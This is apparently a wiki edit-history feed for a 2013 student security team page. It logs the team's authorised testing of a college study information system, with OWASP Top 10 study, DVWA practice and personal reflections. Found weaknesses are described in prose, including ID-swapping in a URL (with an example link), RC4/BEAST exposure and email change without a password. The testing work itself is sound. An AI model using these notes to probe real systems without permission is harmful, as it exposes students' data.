** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62348</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62348"/>
		<updated>2013-04-04T15:08:58Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Results */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
